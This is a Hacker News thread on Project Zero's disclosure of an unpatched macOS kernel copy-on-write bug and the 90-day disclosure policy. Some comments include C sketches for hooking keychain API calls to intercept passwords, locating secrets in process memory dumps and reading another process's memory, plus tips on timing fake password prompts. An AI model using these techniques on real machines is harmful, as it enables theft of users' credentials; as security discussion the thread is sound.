Google reveals “high severity” flaw in MacOS kernel (neowin.net)
373 points by ben201 on March 4, 2019 | 124 comments



Quick Summary: This is a local process escalation bug. Serious, but it seems remote exploitation would require an additional bug.

Project Zero has stuck to their 90-day policy with everyone. They aren't picking on Apple; they've released unpatched bugs for most major vendors.

You may disagree with publication, but keep in mind this is a bug that may be known to some already. There are literally thousands of "private exploits" available for sale if you know where to look.

The 90-day policy forces companies to make their customers safer. If not 90 days, you'd still have to pick some arbitrary length of time, and companies might take a longer deadline even less seriously and miss that too (and people would criticize that as well).


> Quick Summary: This is a local process escalation bug. Serious, but it seems remote exploitation would require an additional bug.

The "additional bug" could just be a compromised update of any popular application available as a free download (see [1])? Then it is serious, because people download and run all kinds of applications from any website that seems useful to them.

[1]: https://en.wikipedia.org/wiki/Transmission_(BitTorrent_clien...


Or an npm package. Or homebrew recipe. Or piping the output of curl into a shell...



Seems this comic gives the opposite evaluation from your parent post.


Yes it was a sardonic "indeed".


On the other hand zero days in OS kernels that run on millions of devices worldwide aren’t your ordinary black market exploits. I agree with publishing after 90 days. This incentivizes shipping patches quickly and fixing root causes later.


Zero-day privilege escalation bugs for macOS (not iOS) probably have no black market at all (or, whatever, the ceiling price in that black market is the public bounty value of the bug).

iOS is of course a very different story and some localhost macOS bugs might have parallels in iOS (not this one though).


Yeah, who would want to be able to target the 5% of the most well-off people in the US (based on the demographics of who splurges for Apple laptops), or people in positions of influence and power (seeing that 1 in 2 politicians/CEOs/writers/journalists/musicians/etc. interviewed seems to use one).


But if you have arbitrary code execution on a MacBook, you probably have everything you want from that MacBook, because consumer desktop OSes and application software are insufficiently locked down to prevent you from getting everything you'd want. Escalating from arbitrary code execution to rooting the MacBook doesn't really make it any more interesting to you.

This is untrue for iOS, because iOS actually does have a pretty robust security model which has only-semi-trusted apps running on your skeleton key to everything.


> But if you have arbitrary code execution on a MacBook, you probably have everything you want from that MacBook

You probably have all the locally available data you could want. You may not have access to passwords, or to data that only comes from actively using an online site for which there are no currently active credentials (because they've timed out or the user logged out previously). For example, depending on the person and the documents they keep locally, you might not have access to any banking information.

Privilege escalation opens up a whole slew of capabilities that make it much easier to achieve that, not to mention allowing a rootkit to get access back immediately after a reboot.

Local account exploits are like a burglar breaking in (even repeatedly) while you aren't home. Privilege escalation is like them installing a remote camera system and recording your every action while you are home. Both are pretty horrible, but certain things are much more likely to be exposed with active monitoring of what you are doing over extended periods...


Ish. I think with a user process in OS X you don't get passwords saved in the keychain, which might well be what you are really after, these days.


With arbitrary code execution you can just wait around until the keychain is used and then grab it out of that process's memory, or prompt the user to unlock it with a convincing-sounding dialog, or whatever.


You would have to know where to look in some specific process memory or have a very convincing prompt to trigger keychain unlock. Doable, sure; but not trivial, and very targeted.

As an aside, any app that triggers gratuitous keychain prompts (I'm looking at you, Skype and Outlook for Mac) is a weapon of mass miseducation. People should think long and hard before authorizing keychain access; if you keep firing prompts at them, they'll end up clicking/tapping without reading what it's for, which is a recipe for phishing.


> You would have to know where to look in some specific process memory or have a very convincing prompt to trigger keychain unlock. Doable, sure; but not trivial, and very targeted.

I don't think it's that hard: it's basically equivalent to finding the value of a variable in a coredump, which is a thing I've done a lot and which debuggers explicitly help you with, even if it's a release build without debug symbols. One way to do it is to inject a controlled password into the same build of the program on your own machine, dump its memory, search for the password, and then reverse ASLR if needed (which is easy if you have full memory read/write access; the point of ASLR is to make limited-access vulnerabilities like small stack overflows hard to exploit, but sort of by definition the information about where libraries are is located somewhere in the process so that the process itself can run). You can then script doing the same thing once per current-ish release build per current-ish OS, and get a robust automated attack.
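To make the "find the offset on a machine you control" step concrete, here is a minimal sketch (hypothetical file names; memmem() is a glibc/BSD extension that is also available on macOS):

    /* Locate a known, injected marker password inside a raw memory dump
     * taken on a machine you control. The resulting offset (relative to
     * the library or heap base recorded alongside the dump) is what you
     * would reuse against the same build elsewhere. */
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
        if (argc != 3) {
            fprintf(stderr, "usage: %s <dump-file> <marker>\n", argv[0]);
            return 1;
        }
        FILE *f = fopen(argv[1], "rb");
        if (!f) { perror("fopen"); return 1; }
        fseek(f, 0, SEEK_END);
        long size = ftell(f);
        rewind(f);

        char *buf = malloc(size);
        if (!buf || fread(buf, 1, size, f) != (size_t)size) {
            fprintf(stderr, "read failed\n");
            return 1;
        }
        /* memmem() scans binary data for the marker bytes. */
        char *hit = memmem(buf, size, argv[2], strlen(argv[2]));
        if (hit)
            printf("marker found at dump offset %ld\n", (long)(hit - buf));
        else
            printf("marker not found\n");
        free(buf);
        fclose(f);
        return 0;
    }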

In general I think people overestimate the difficulty of doing clever things with process memory (one of my favorites here is the "Vudo" exploit from 2001 http://phrack.org/issues/57/8.html in which sudo could be tricked into temporarily writing a 0 byte one past the end of a buffer and then restoring the original byte, and it's still exploitable to get root). If you haven't done it yourself, it sounds harder than it is, and betting that it's hard because it sounds complicated when there's no actual isolation boundary is more-or-less security by obscurity.

The same thing applies to triggering keychain prompts: use a side channel (e.g., polling the stack of a legitimate process) to figure out when the user is likely to need a keychain unlock, then trigger a keychain unlock for your app at the same time. (Note that you can either pop up a dialog on your own or actually request keychain access for your own process.) You also might not even need to time it: just rely on the fact that the vast majority of users are going to respond to security prompts in a way that appears to unblock their jobs, without evaluating whether the prompt is reasonable. See studies on click-through rates of cert warnings before they got hard to click through, the continued effectiveness of phishing / spear-phishing, etc. If you pop up a dialog saying "Java Updater needs your password," I bet you'll get a ton of people who don't even have Java installed type in their password.


You hook Apple's Keychain access API in every running app and then intercept passwords coming from it before they're returned to the requesting application. Every app using the Keychain is using the same API and you can easily enumerate the loaded dylibs to find the functions to hook.
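Roughly, a sketch of that kind of hook (hypothetical, and note that SIP, the hardened runtime, and library validation block DYLD_INSERT_LIBRARIES against most modern signed apps, so this is illustrative only):

    /* Interpose SecItemCopyMatching via dyld's __interpose mechanism.
     * Build as a dylib and inject with DYLD_INSERT_LIBRARIES where the
     * platform still allows it. */
    #include <Security/Security.h>
    #include <stdio.h>

    static OSStatus my_SecItemCopyMatching(CFDictionaryRef query, CFTypeRef *result)
    {
        OSStatus status = SecItemCopyMatching(query, result);
        if (status == errSecSuccess && result && *result)
            fprintf(stderr, "[hook] keychain item handed to caller\n");
        /* a real payload would copy *result somewhere before returning */
        return status;
    }

    /* dyld interposition tuple: { replacement, replacee } */
    __attribute__((used)) static struct {
        const void *replacement;
        const void *replacee;
    } interposers[] __attribute__((section("__DATA,__interpose"))) = {
        { (const void *)my_SecItemCopyMatching, (const void *)SecItemCopyMatching },
    };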


Maybe I'm missing something, but reading something from another process' memory isn't a thing you can do, is it?


In general, for processes running as the same user on traditional desktop / server OSes (Windows, Mac, UNIX), it is. On mobile it's not because they had no backwards compatibility to care about (specifically, iOS applies heavy sandboxing to apps and Android runs them as different Linux user IDs). And desktop app stores are moving towards the same model. On Linux, SELinux/AppArmor/etc. might also prevent this depending on config.

More fundamentally, an unsandboxed process can do things like set environment variables, update config files, modify applications installed into the user's home directory, read your browser cookies, etc. as a consequence of traditional desktop apps having unrestricted access to the user's home directory, so preventing reading memory doesn't really prevent one app from attacking another.


Huh. Thanks, I'm surprised I didn't know that.


I don't think that's true at all, not since like Win95 days at least...

Perhaps I'm also completely misinformed or misunderstanding what GP is saying, but each process is meant to get its own virtual address space.


Yes, processes get their own address space, but there are APIs to read/write the address space of other processes, and on traditional desktop OSes, those APIs are accessible to other processes running as the same user. Virtual address spaces are for a) protection between processes running as different users and b) stability when other processes are incompetent but not malicious.

Windows: https://docs.microsoft.com/en-us/windows/desktop/api/memorya...

macOS (Mach): https://developer.apple.com/documentation/kernel/1402405-mac...

Linux: /proc/*/mem or http://man7.org/linux/man-pages/man2/process_vm_readv.2.html

and so forth.
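As a concrete illustration of the Linux flavor, here's a minimal sketch using process_vm_readv() (assuming a default ptrace/Yama configuration that permits same-user access):

    /* Read 64 bytes from another process owned by the same user. */
    #define _GNU_SOURCE
    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <sys/uio.h>

    int main(int argc, char **argv)
    {
        if (argc != 3) {
            fprintf(stderr, "usage: %s <pid> <hex-address>\n", argv[0]);
            return 1;
        }
        pid_t pid = (pid_t)atoi(argv[1]);
        void *remote_addr = (void *)(uintptr_t)strtoull(argv[2], NULL, 16);

        char buf[64];
        struct iovec local  = { .iov_base = buf,         .iov_len = sizeof buf };
        struct iovec remote = { .iov_base = remote_addr, .iov_len = sizeof buf };

        ssize_t n = process_vm_readv(pid, &local, 1, &remote, 1, 0);
        if (n < 0) { perror("process_vm_readv"); return 1; }
        printf("read %zd bytes from pid %d at %p\n", n, (int)pid, remote_addr);
        return 0;
    }

The Windows and Mach calls linked above (ReadProcessMemory, mach_vm_read) follow the same shape, modulo the extra handle/task-port lookup.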


I was under the impression that on macOS you ultimately needed to get the task_t to do stuff with a target task, and that getting this for a target task was a privileged operation (unless the target task sent it to you).


True - it has been getting increasingly hard on macOS (I just tried lldb on the command line and it's complaining about System Integrity Protection). It might actually be at the point where malicious software can't get access even with some cleverness?


Yes, they do get their own virtual address space, but any process running as your user can manipulate any file that user has access to (by default, without any sandboxing, which some recent apps on macOS/Linux do use, but which is not the default). Often any process running as a user can attach a debugger to any other process running as that user, which is tantamount to having complete control of that process (because a debugger can read and write memory).


Separate address spaces mean that one process won't accidentally stomp on or read from other processes' memory, not that they can't if they choose to. A debugger is the canonical example of something whose sole purpose is to inspect and modify the state of another process. There are some permissions and restrictions around the ability to do this, but most desktop OSes won't stop a user from doing so to processes they own.


How about all the other password managers, especially Chrome's?


It depends how well they are implemented (what is stored where, how it is stored and accessed, etc.). It would certainly be trivial to grab the necessary files from a Chrome or Firefox profile, but if they are well-encrypted they could be practically uncrackable (although, as we know, that definition changes fast these days). At that point it becomes about attacking or impersonating the actual process, which is not that easy - you might need another exploit for the app, or to replace the entire app without arousing suspicion (a lot of apps are not even installed in the user profile, so this might well be impossible). In the end, it very much depends, but I don't think it's as trivial as some suggest - at least for mass attacks/viruses; specific targeting is a different ballgame.


Nowadays I don't think Chrome even stores the passwords locally. Maybe for signed-out users, but it seems like all my passwords are stored at passwords.google.com.


It very much stores the passwords locally, even if you enable syncing. It wouldn't make sense for it not to.


Gnome keyring was storing credentials in memory in plain text until very recently

https://nvd.nist.gov/vuln/detail/CVE-2018-20781


Does root access directly get you keychain credentials (or does it only get it via the possibility of key logging)?


In the past, you’d be able to read it out of the process memory when the keychain was unlocked. I believe that’s been locked down in the last couple of releases, however.


If it's so important a target, the people who say this should be able to produce (even a questionably sourced!) price list with fat dollar amounts for macOS local privilege escalation. Then at least it would be a poorly supported argument instead of merely an argument by motivated conspiratorial reasoning.


I'll comment against my own rhetorical interest here and point out that Zerodium has macOS LPE (with sandbox escape) listed at "up to $6k". But they list a bunch of things I'm not really confident they actually "want" to buy.


Is it against rhetorical interest? Granted, I didn't define 'fat dollar amounts' but $6k is not that fat nor does it sound to me like it's significantly more than you'd get for that type of bug from Apple.


[flagged]


Even if you weren’t hilariously inappropriate in your choice for who to level that criticism at (check his profile) this comment doesn’t contribute anything of value since you didn’t engage with any of the concrete points being discussed.


You can assume tptacek has a somewhat more informed position on this than that of a "mac user trying to ignore the problem".


Well, as a lot of developers use OS X, I could see the potential for code/token/authentication-sniffing malware that sniffs out git credentials and other authentication tokens. This could then be used to gain access to backend servers and/or to inject backdoors and malware into software.


This bug requires local code execution capabilities. How many of the scenarios you describe are there where someone couldn’t simply use that to harvest credentials directly?


Is macOS not a large enough target, or is there something else at play here?


I would guess most of the things you'd want to do on a mac, you can just do as a user -- you can already access everything in the user's home directory for example.


Not in macOS Mojave. Sensitive directories (Safari, Mail, etc.) are inaccessible to apps without permission.


>you can just do as a user -- you can already access everything in the user's home directory for example

As opposed to what other operating system? Even Linux with SELinux allows that...


As opposed to Android, iOS… and some rare cases of sandboxed Linux apps (a small subset of flatpak, snap, etc.)


If we're talking about sandboxing, then macOS has that too. Apps installed through the MAS have specific sandboxes they can play in and require permission for the others.


https://xkcd.com/1200/ points out that if malicious code runs as a user they can read my e-mails, access all my files, and keylog my passwords. By escalating to root, they can... what? Install OS updates and drivers? Mount and unmount disks? Access the serial port? Persist their access in a slightly harder to detect manner?

Of course, it's a different matter for shared computers in school computer labs. Or if mac servers were a thing.


It would be difficult for an arbitrary process to do that on macOS. They can access your files, but your passwords are in the keychain and emails in a data vault, both of which require permission to access.


Install ransomware that is annoying to remove.


Does it really matter if the ransomware is easy to remove? If you remove the ransomware, your files will still be encrypted.


Solid point.


It’s a minuscule market. 1% of the desktop market, which itself is a market in decline.


The size of the market alone is not a good indicator. Macs are routinely sighted among C-level executives or journalists, and among their family members. And it looks like the kind of issue that could be exploited as part of an APT. It's pretty much the kind of thing that you expect to pop up for sale in shady places.


I sometimes see people make the argument that the tiny amount of Mac-users are somehow more important/valuable compared to the immense swath of non-Macs out there, and I always suspect it’s Mac-users trying to assert their own importance, stroke their own ego and/or justify their needless expenditure.

So tell me kind sir: what OS do you use?


I'm a Linux user who much prefers Linux to Mac and I agree with the comment you're replying to.


Exactly. I run my own arch distro and still recognize that macs are used by large numbers of higher ups in every single company I consult at.


I run Linux (edit: and a bunch of OpenBSD virtual hosts, I guess?) and don't own any Apple device. Sorry :).


1% of the desktop market? No way. It's at least 10%.


10% of laptops maybe but 10% of desktops? Think of all those thousands of Windows desktops in offices everywhere around the world.


Probably not that high worldwide. Either way, it’s still tiny and shrinking.


10% is neither "tiny" nor shrinking. If anything their year over year numbers are better compared to the overall market...


The opposite, it’s a massive target. I believe the reasoning is that because it is such a large target the black market doesn’t set the price. It gets set by the bounty price the maintainer offers. I’m not familiar with the dynamics of the zero-day black market so I wouldn’t know myself.


It's just that the bug is worthless, beyond what the vendor will pay for it in a bounty.


Why is iOS a different story?


iOS is one of the world's 3 most important COTS platform targets, along with Chrome and (guessing?) Windows. Localhost privilege escalation on iOS can be a link in a drive-by jailbreak chain.


Are there non COTS platform targets more important/valuable than iOS/Chrome/Windows?

Some kind of embedded/industrial control system? z/OS?


iOS has universal inter-app sandboxing. macOS is getting there, but not quite yet. So on iOS, a privilege escalation vulnerability is useful for getting data out of a different unprivileged context; on macOS, you might already be in that context.


It’s a big and hard-to-exploit target?


It would be easier to justify this if Apple responded to their bugs.


Seriously, there are open Safari bugs that have existed in Apple's system for 6+ years. At least slap a wontfix on there.



I'm trying to figure out what the expected behavior (and fix) should be. Basically the bug is that an external process could poison a process's version of a file by silently manipulating the file and causing the file to be reread.

Given the requirement that a secondary process should even be able to modify a file that is already open, I guess the expected behavior is that the 1st process's version should remain cached in memory while allowing the on-disk (CoW) version to be updated? While also informing the 1st process of the update and allowing it to reload/reopen the file if it chooses to do so. If this is the intended/expected behavior, then it follows that pwrite() and other syscalls should inform the kernel and prevent the original cache from being flushed.


From what I understand, that seems about right. I don't think the first process's version should necessarily remain in the page cache, but it should not be reread from the (modified) backing filesystem.


Still don't understand it though. If the bad code is already able to alter the files on disk, does it really make a difference whether the data was altered before or after the using code had mapped it into its memory? Either the file is changed before the process starts, in which case it already gets bad data, or it is altered after, in which case it only sees it after experiencing memory pressure.

Wouldn't the issue be the change on disk in the first place ?


Reading the bug report it sounds like it has more to do with the Copy-on-Write behavior.

If I've understood correctly, I think it works something like this:

A privileged process needs to use some shared-object/library, and the OS loads that file into memory for it.

An unprivileged process creates an exact duplicate of the library file and asks the OS to load that into memory. This triggers the copy-on-write system to realize that these are identical, and creates a link between them so that both processes are using the same chunk of memory.

The privileged process then doesn't actually use the library for a while, so the OS pages it out of memory, while keeping that copy-on-write link around.

This is where the sneaky/buggy part lies, in that it's possible for the unprivileged process to modify its version of the library file without the copy-on-write system being informed of the write (and thus separating the two diverging copies). This is apparently related to some details of how mounting filesystem images works.

The next time the privileged process tries to use the library, the OS sees that it has already been paged out, but hey here's this copy-on-write link pointing at this "identical" version over here, and loads the poisoned version into the privileged process.
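If it helps to see the shape of it, here's a rough sketch of how one might probe the core misbehavior from a single process (placeholder paths, not the actual Project Zero PoC; the "mutate the image out of band" and memory-pressure steps are elided, and they are the interesting part):

    /* Map a file from a user-mounted disk image copy-on-write, then check
     * whether the mapping silently changes after the backing image is
     * modified and the clean page is evicted. */
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/mman.h>
    #include <unistd.h>

    int main(void)
    {
        /* 1. Attach a user-controlled disk image (path is a placeholder). */
        system("hdiutil attach ./scratch.dmg");

        /* 2. Map a file from it the way dyld maps libraries: private/CoW. */
        int fd = open("/Volumes/SCRATCH/victim.bin", O_RDONLY);
        if (fd < 0) { perror("open"); return 1; }
        unsigned char *p = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0);
        if (p == MAP_FAILED) { perror("mmap"); return 1; }
        unsigned char before = p[0];

        /* 3. Elided: rewrite the corresponding bytes in scratch.dmg directly
         *    (e.g. pwrite() into the image file), then create enough memory
         *    pressure that the clean page gets evicted. */

        /* 4. Touching the page faults it back in from the (now modified)
         *    backing store; on a vulnerable kernel the mapping changes
         *    underneath the reader without any CoW copy being made. */
        unsigned char after = p[0];
        printf("before=0x%02x after=0x%02x %s\n", before, after,
               before == after ? "(unchanged)" : "(mapping was poisoned)");
        munmap(p, 4096);
        close(fd);
        return 0;
    }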


Thanks for this info. Yeah, this kind of scenario is unacceptable. I did not see that the files are single-instanced in memory. Is the overhead for this even worth it? Two files being loaded that are exactly identical sharing the same RAM space (writable too) sounds like overhead for no usable gain. I guess when you are compressing RAM anyway they might calculate checksums and thus have the info to coalesce chunks, but it sounds like a really bad choice.


Doing this CoW stuff with file-mapped pages generally must be kind of weird. Normally with a CoW page you just mark the page entry as read-only, and then when the process tries to modify the page you create a copy of the page for that process. The only mapping that changes is the one belonging to the process that tried to write to the page.

But with file-mapped pages this is going to be a bit weird, because processes with a file page mapped MAP_SHARED should see others' modifications of a MAP_SHARED page, and presumably when a process modifies a file-mapped page that is marked read-only, the kernel now has to update all the other processes to point at this new writable page. I think it is easy to modify the current process's page table; I'm not sure how easy it is to modify other processes' view of the page table. Though maybe the kernel wouldn't let you do this CoW trick with a MAP_SHARED mmap; maybe it would only let you do it with a MAP_PRIVATE mmap.
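For anyone who hasn't poked at this, here's a small, generic illustration of the MAP_SHARED vs MAP_PRIVATE split being described (behaves the same way on Linux and macOS):

    /* A write through a MAP_SHARED mapping is visible through another
     * shared mapping of the same file; a MAP_PRIVATE mapping that has
     * already been written to keeps its own CoW copy instead. */
    #include <fcntl.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/mman.h>
    #include <unistd.h>

    int main(void)
    {
        int fd = open("cowdemo.bin", O_RDWR | O_CREAT | O_TRUNC, 0600);
        ftruncate(fd, 4096);

        char *shared1 = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_SHARED,  fd, 0);
        char *shared2 = mmap(NULL, 4096, PROT_READ,              MAP_SHARED,  fd, 0);
        char *priv    = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);

        strcpy(priv, "private");   /* write triggers CoW: this mapping diverges */
        strcpy(shared1, "shared"); /* lands in the file's shared page cache */

        printf("shared2 = \"%s\"\n", shared2);  /* prints "shared" */
        printf("priv    = \"%s\"\n", priv);     /* prints "private" */

        munmap(shared1, 4096); munmap(shared2, 4096); munmap(priv, 4096);
        close(fd);
        unlink("cowdemo.bin");
        return 0;
    }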


Am I mistaken in thinking that Windows is immune to this kind of bug?

Also, why isn't this a problem in Linux or BSD?


> The researcher informed Apple about the flaw back in November 2018, but the company is yet to fix it even after exceeding the 90-day deadline, which is why the bug is now being made public with a "high severity" label.

Are they giving any reasons for the delay?


The reason doesn't matter. I can't think of one reason for which the delay in patching justifies not following the 90 day policy.


What if it's something nasty like Spectre, where you're coordinating at least getting some mitigations across multiple ecosystems, and disclosing the vulnerabilities (particularly, say, the Meltdown fun, or NetSpectre) without available mitigation could be disastrous?

90d seems like sufficient time for many processes, particularly if you're used to iterating in somewhat flexible or always-releasable environments, but as soon as you start involving multiple systems with different timetables, the time requirements to meet everyone's process needs can balloon, particularly if it's something requiring substantial changes (and thus, substantial testing).

(I'm in favor of the default 90d disclosure policy, just wanted to point out that there are sometimes legitimate justifications for longer timelines.)

(Work for elgooG, not on anything remotely related to GPZ, opinions my own, etc.)


> What if it's something nasty like Spectre

Exceptional case. The deadline WAS extended: reported 1 Jun 2017, disclosed Jan 2018.

https://bugs.chromium.org/p/project-zero/issues/detail?id=12...


Here is the list of (fixed, public) cases where the deadline was extended (sorted by vendor):

https://bugs.chromium.org/p/project-zero/issues/list?can=1&q...

and here is the list of bugs where the deadline expired:

https://bugs.chromium.org/p/project-zero/issues/list?can=1&q...


Imho Meltdown/Spectre is a bad example from this point of view: it was dealt with very badly, with a lack of information to some players (e.g. OpenBSD, if I recall correctly), and earlier disclosure than agreed (with potentially some patches rushed out the door because they were meant for days later).


IIRC OSes that weren't Windows/OSX/Linux didn't get invited to play in the embargo sandbox either until very late or not at all, so e.g. illumos and the BSDs were either completely in the dark or caught with relatively little time to do anything, especially because people inferred a bunch of the details before the embargo was supposed to expire from various patches and snippets of information leaking.

There was also the issue that gregKH complained about, where the different major Linux distros on the embargo basically got siloed by Intel out of talking to each other, so they ended up building their own solutions. [3]

[1] suggests FBSD got to the NDA sandbox relatively shortly before it went public. [2] says OpenBSD indeed did not.

[1] - https://lists.freebsd.org/pipermail/freebsd-security/2018-Ja...

[2] - https://marc.info/?l=openbsd-tech&m=151521435721902

[3] - https://www.eweek.com/security/linux-kernel-developer-critic...


I remember (but I might be misremembering) one case of an AV vendor getting the deadline extended by a day or two as they promised the patch was as good as done. When nothing happened, Google published.


Of course reasons matter. Apple actually got some extra time when there was a fundamental flaw in XNU's task structure handling since fixing it properly required some heavy refactoring in the kernel.


Link should probably be updated to point to project zero itself: https://bugs.chromium.org/p/project-zero/issues/detail?id=17...


The comments on the page are fun if you have a few minutes.

Say what you want about Google, but groups like Project Zero and Talos from Cisco are awesome. The things they find...


I wonder what would be cheaper for Google, et al.: paying lots of engineers to bug hunt all day, or simply going out and buying a bunch or all of the high profile bugs from shady websites and then just publishing them.


I wouldn't be surprised if the value in project zero is mostly in training the engineers to find these vulnerabilities.


Consider that the most critical bugs found by black hats probably never make it out into any market, open, shady, or otherwise. They're probably kept internal to the team that found them, or sold/traded directly between organizations with long relationships.


Does this apply to files on an HDD or SSD as well, or is this specific to mounted images only?

(Meaning, is this about CoW in general or about memory management related to mounted images?)


This applies to copy-on-write of files on mounted disk images only.


A must-read for future OS designers...


Also a high severity flaw with this freaking butterfly keyboard. Please let the world know Google.


This is completely unrelated. Please don't use threads like these as a way to voice your complaints about Macs in general when doing so isn't relevant.


oy


The 90-day policy is fine. If you can fix the problem, this is enough time to hire an entire team.


> The 90-day policy is fine. If you can fix the problem, this is enough time to hire an entire team.

Is 90 days enough to fully fix, for example, Spectre and Meltdown? I'm not sure all bugs can be fixed in 90 days. Some will take decades to resolve.


Spectre/Meltdown were given 6 months instead of the normal 90 days.


You can request an extension (grace period). The point is, Apple didn't respond until it was too late.

https://googleprojectzero.blogspot.com/2015/02/feedback-and-...


Spectre is a special case and I think you know it's a special case. Cut it out.


Why's it not a valid counter-example? It's a special case because it doesn't fit the 90 day estimate? Well yeah that's why it's a counter-example.


Because at its core, it's a hardware design flaw, not a software bug.

Also it affected multiple vendors, not one, so coordination across a minimum of 10 major organizations (Google, Apple, MS, Amazon, Intel, AMD, Linux, etc.) breaks the normal assumptions behind Project Zero.

Given those issues, different rules make sense. It's not a normal case where a single vendor has a flaw that can be fixed with a single patch.


In the past I thought that macOS didn't have bugs; how wrong I was...


I assume you're joking.


Is there a compelling reason this is being released prior to a patch going out?


Literally the second sentence: "Its members locate flaws in software, privately report them to the manufacturers, and give them 90 days to resolve the problem before publicly disclosing it."

Privately disclosed to Apple, 90 days later they published. Simple as that.


I used to think that 90 days was quite unfair. And in many ways it can be. But it's a great equalizer. That way no one company can claim that some other company got preferential treatment, and everyone by now knows that that's what it's going to be, instead of the P0 team having to have a fruitless back and forth with vendors about the impact and what would be a reasonable timeline for disclosure.


90 days is equality but not equity. Not all bugs can be fixed in the same way. Moreover, 90 days seems arbitrary to me, unless there was some prior study behind this number.


You're absolutely right! 90 days does seem incredibly arbitrary, like it was chosen for political reasons. And this policy is definitely equal, but wildly inequitable.

Is it perhaps possible that equitable treatments of vulnerabilities and companies might not be particularly high on the list of priorities for GPZ? Some might even argue that past attempts at equitable treatment have backfired badly, with many cases of companies abusing the time this gets them to not fix vulnerabilities.

Again, you're completely correct. Though I would genuinely love to hear your ideas of what equitable policy would look like - it could easily be better!


It’s just a number that Google Project Zero has decided is what they’re going to hold companies to.


‘Holding them to’ makes it sound like Google has some kind of moral authority here.

I understand the positive incentives for publishing when companies do not respond to flaws.

However Google has no particular right to police other companies.

If they disclose at 90 days, and harm ensues, there is no defense. Google is responsible.


Google has the responsibility to inform users that the software they are using has known vulnerabilities as much as they have a responsibility to disclose them quietly to the software vendors that can fix them.

The way you laid things out, Google should just collect zero-days and sit on them? Do you see the absurdity of that? From a business perspective, having these vulnerabilities around makes it easier for their competitors to collect the same kinds of data about internet search and private emails from people around the internet that Google collects through legit means. Getting vulnerabilities fixed widens Google's data moat.

Disclosing issues is not "policing". They are not arresting people, or taking any action other than stating the truth, that some software is vulnerable.

If they disclose at 90 days and harm ensues, the user bears responsibility for continuing to use the software. If they trust the software vendor to issue timely updates, then they can turn around and lay blame at the vendor for not fixing the issue. Or they can blame the hacker.


Preferential treatment is irrelevant. If harm is done due to the public disclosure, Google is the cause.


>Privately disclosed to Apple, 90 days later they published. Simple as that.

Some bugs may take longer than that to fix. I still don't think it's an unreasonable question to ask.


The standard time frame is 45 days.

https://ics-cert.us-cert.gov/ICS-CERT-Vulnerability-Disclosu...

Google is being more than generous, doubling to 90 days.


I assume the GP was asking if the 90 day rule was really important to uphold, or if the disclosure could just be delayed longer until the patch went out.


Well, expecting there to be a patch without the 90-day exploit exposure is very generous. The whole point of a 90-day (or any arbitrary stretch of time) deadline is that a lot of companies are funny when it comes to exploits. Security doesn't ever make a company money; it's a high cost that can only (at best) hope to prevent the company from having to make reparations after a breach, or maybe lose a few customers. As such, many companies treat security reports with indifference and do nothing whatsoever about reported exploits until they're forced to. The only real way private researchers or security groups like Project Zero have to light a fire under the company concerning the exploit is to release the exploit to the public when it becomes clear that the company isn't going to fix the vulnerability on their own. At least now consumers are made aware of the exploit and can make an informed decision on a plan of action. 90 days, 180 days, a year... it doesn't matter, because people would criticize the length of time no matter what it is.


The process is policy and is automated; no one gets extra time. AFAIK the clock starts from when they get the first reply from the company.


It can actually be overridden if the vendor declares a release will happen within 14 days of the 90-day deadline.


Allowing companies to take their time fixing critical security issues puts users at risk. That’s compelling enough for me. As an Apple user I’m a bit upset that they haven’t patched after over three months.


The researcher informed Apple about the flaw back in November 2018, but the company is yet to fix it even after exceeding the 90-day deadline, which is why the bug is now being made public with a "high severity" label. That said, Apple has accepted the problem and is working with Project Zero on a patch for a future macOS release. You can also view the proof-of-concept code that demonstrates the problem on the dedicated webpage here.


Presumably they want to inform users so they know they're vulnerable, if no patch is forthcoming.



